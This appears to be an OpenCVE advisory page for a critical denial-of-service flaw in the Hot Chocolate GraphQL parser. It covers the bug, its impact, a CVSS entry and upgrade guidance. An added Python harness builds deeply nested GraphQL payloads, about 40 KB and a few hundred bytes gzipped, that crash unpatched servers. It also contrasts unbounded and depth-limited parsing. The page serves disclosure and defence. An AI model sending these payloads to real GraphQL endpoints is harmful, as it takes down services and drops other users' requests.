Description
Hot Chocolate is an open-source GraphQL server. Prior to versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14, Hot Chocolate's recursive descent parser `Utf8GraphQLParser` has no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as 40 KB. Because `StackOverflowException` is uncatchable in .NET (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs before any validation rules run: `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. The fix in versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14 adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround, because `StackOverflowException` cannot be caught in .NET; the only fix is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (a few hundred bytes via gzip).
Published: 2026-04-17
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Denial of Service
Action: Immediate Patch
AI Analysis

Impact

Hot Chocolate, the GraphQL server library, parses incoming documents with a recursive descent parser that has no bound on recursion depth. When an attacker sends a GraphQL document with deeply nested selection sets, object values, list values, or list types, each nesting level adds another native stack frame until the thread's stack is exhausted and a StackOverflowException is raised. Because that exception is uncatchable in .NET, the entire worker process terminates: all in-flight HTTP requests, background services, and WebSocket subscriptions fail, and the orchestrator has to restart the process. The issue is resolved in releases 12.22.7, 13.9.16, 14.3.1, and 15.1.14, which add a MaxAllowedRecursionDepth parser option with a safe default and throw a catchable SyntaxException when it is exceeded instead of allowing the stack to overflow.

Affected Systems

Systems built with the ChilliCream Hot Chocolate GraphQL platform running a version earlier than 12.22.7, 13.9.16, 14.3.1, or 15.1.14 are affected. This includes any .NET application that hosts the Hot Chocolate library to process GraphQL requests, whether it exposes the endpoint over HTTP, WebSocket subscriptions, or both. The failure occurs inside the application process, so it is independent of the hosting environment (bare metal, containers, IIS, Kubernetes).

Risk and Exploitability

The CVSS score of 9.1 indicates Critical severity. The EPSS score is currently below 1%, but the technical barrier to exploitation is low: a single unauthenticated POST is enough, the smallest known crashing payload is about 40 KB, which is below most default request body limits, and it compresses to a few hundred bytes, so a body size cap at the proxy is only a partial mitigation. Because the overflow happens in the parser, before any GraphQL validation runs, standard defences such as execution depth limits, complexity analysis, and persisted query allow-lists do not protect the service. An attacker who can reach the GraphQL endpoint can take down the worker process repeatedly, and each crash also drops unrelated requests and subscriptions on that worker, which makes this a high-impact denial of service in production environments.
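The following Python harness is an added example, not code from the advisory or from the Hot Chocolate project. It builds the four nesting shapes the advisory names (selection sets, list values, object values, list types), reports how small such a document is on the wire, and contains a toy recursive-descent selection-set parser in two modes: unbounded, mirroring the pre-fix Utf8GraphQLParser pattern where every nested `{` is another stack frame, and depth-limited, mirroring the patched behaviour where a catchable error is raised on entry to the frame that would exceed the limit. The toy grammar (anonymous query, bare field names) and the 13653-level payload that lands at roughly 40 KB are assumptions chosen for illustration; Python's RecursionError stands in for the .NET StackOverflowException, with the important difference that the Python one can be caught.

```python
import gzip
from typing import Optional, Tuple

# Added example (not Hot Chocolate code): payload generators for the four nesting
# shapes in the advisory, a raw/gzip size probe, and a toy parser that shows the
# unbounded recursion pattern next to the depth-limited (patched) pattern.


class DepthLimitExceeded(Exception):
    """Catchable analogue of the SyntaxException the patched parser throws."""


def selection_set_payload(depth: int) -> str:
    """`{a{a{a}}}`: one field per level, selection sets nested `depth` deep."""
    return "{a" * depth + "}" * depth


def list_value_payload(depth: int) -> str:
    """`{f(x:[[[]]])}`: one field whose argument is a list value nested `depth` deep."""
    return "{f(x:" + "[" * depth + "]" * depth + ")}"


def object_value_payload(depth: int) -> str:
    """`{f(x:{a:{a:0}})}`: one field whose argument is an object value nested `depth` deep."""
    return "{f(x:" + "{a:" * depth + "0" + "}" * depth + ")}"


def list_type_payload(depth: int) -> str:
    """`query($v:[[Int]]){f(x:$v)}`: the nesting sits in the variable's type reference."""
    return "query($v:" + "[" * depth + "Int" + "]" * depth + "){f(x:$v)}"


def sizes(doc: str) -> Tuple[int, int]:
    """(raw byte length, gzip length): how little an attacker has to send."""
    raw = doc.encode()
    return len(raw), len(gzip.compress(raw, compresslevel=9))


def parse_selection_set(src: str, pos: int, depth: int,
                        max_depth: Optional[int]) -> Tuple[int, int]:
    """Parse `{ name [selection_set] ... }` with src[pos] == '{'.

    Returns (index after the closing '}', deepest level reached). With
    max_depth=None nothing stops the recursion (pre-fix pattern); with a limit
    the check runs on entry, so at most max_depth+1 frames are ever live.
    """
    if max_depth is not None and depth > max_depth:
        raise DepthLimitExceeded(f"nesting {depth} exceeds limit {max_depth}")
    pos += 1  # consume '{'
    deepest = depth
    after_name = False  # a nested selection set is only legal right after a field name
    while True:
        while pos < len(src) and src[pos].isspace():
            pos += 1
        if pos >= len(src):
            raise ValueError("unterminated selection set")
        ch = src[pos]
        if ch == "}":
            return pos + 1, deepest
        if ch == "{" and after_name:
            pos, d = parse_selection_set(src, pos, depth + 1, max_depth)
            deepest = max(deepest, d)
            after_name = False
        elif ch.isalpha() or ch == "_":
            while pos < len(src) and (src[pos].isalnum() or src[pos] == "_"):
                pos += 1
            after_name = True
        else:
            raise ValueError(f"unexpected {ch!r} at offset {pos}")


def max_selection_depth(doc: str, max_depth: Optional[int] = None) -> int:
    """Deepest selection-set nesting in `doc` (toy grammar: anonymous query only)."""
    pos = 0
    while pos < len(doc) and doc[pos].isspace():
        pos += 1
    if pos >= len(doc) or doc[pos] != "{":
        raise ValueError("expected '{' at document start")
    _, deepest = parse_selection_set(doc, pos, 1, max_depth)
    return deepest


def outcome(doc: str, max_depth: Optional[int]) -> str:
    """'ok', 'rejected' (clean, catchable) or 'stack-exhausted' (RecursionError here;
    in .NET the equivalent StackOverflowException kills the process instead)."""
    try:
        max_selection_depth(doc, max_depth)
        return "ok"
    except DepthLimitExceeded:
        return "rejected"
    except RecursionError:
        return "stack-exhausted"


if __name__ == "__main__":
    doc = selection_set_payload(13653)  # about 40 KB, the size the advisory cites
    raw, packed = sizes(doc)
    print(f"raw={raw} bytes  gzip={packed} bytes")
    print("unbounded :", outcome(doc, None))                  # stack-exhausted
    print("limit=64  :", outcome(doc, 64))                    # rejected
    print("benign    :", outcome(selection_set_payload(8), 64))  # ok
```

The generators are useful for a pre-upgrade check against a staging instance (never production, since an unpatched server dies on the first hit): a patched build answers the nested document with a GraphQL syntax error, an unpatched one drops the connection and the worker restarts. The gzip figure is the reason a proxy body-size cap is only a partial mitigation: enforce the cap on the decompressed body, not the compressed one.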

Generated by OpenCVE AI on April 18, 2026 at 08:49 UTC.

Remediation

Fixed in Hot Chocolate 12.22.7, 13.9.16, 14.3.1, and 15.1.14 (see GHSA-qr3m-xw4c-jqw3). There is no application-level workaround for unpatched versions, because the crash happens in the parser before any user code or validation rule runs and a StackOverflowException cannot be caught in .NET.

OpenCVE Recommended Actions

  • Upgrade Hot Chocolate to version 12.22.7, 13.9.16, 14.3.1, or 15.1.14, which add the MaxAllowedRecursionDepth parser option and enforce it in every recursive parser method.
  • If an immediate upgrade is not possible, enforce a stricter maximum request body size at the reverse proxy or load balancer, applied to the decompressed body, and consider rejecting compressed request bodies on the GraphQL endpoint. Treat this as risk reduction only: the smallest known crashing payload is about 40 KB and compresses to a few hundred bytes, so a cap that still admits legitimate queries may also admit the crashing document.
  • After upgrading, keep the default MaxAllowedRecursionDepth or set an explicit value in ParserOptions that covers your deepest legitimate documents, and confirm in a test that a deeply nested query is answered with a syntax error (the catchable SyntaxException) rather than a process restart.


Advisories
Source: GitHub GHSA
ID: GHSA-qr3m-xw4c-jqw3
Title: ChilliCream GraphQL Platform: Utf8GraphQLParser Stack Overflow via Deeply Nested GraphQL Documents
History

Fri, 17 Apr 2026 23:30:00 +0000

Values removed: none

Values added:

Description: Hot Chocolate is an open-source GraphQL server. Prior to versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14, Hot Chocolate's recursive descent parser `Utf8GraphQLParser` has no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as 40 KB. Because `StackOverflowException` is uncatchable in .NET (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs before any validation rules run — `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. The fix in versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14 adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip).

Title: Hot Chocolate's Utf8GraphQLParser has Stack Overflow via Deeply Nested GraphQL Documents

Weaknesses: CWE-674

References: none

Metrics: cvssV3_1 {'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-17T23:05:26.217Z

Reserved: 2026-04-10T21:41:54.505Z

Link: CVE-2026-40324

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-04-18T00:16:36.920

Modified: 2026-04-18T00:16:36.920

Link: CVE-2026-40324

Red Hat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T09:00:05Z

Weaknesses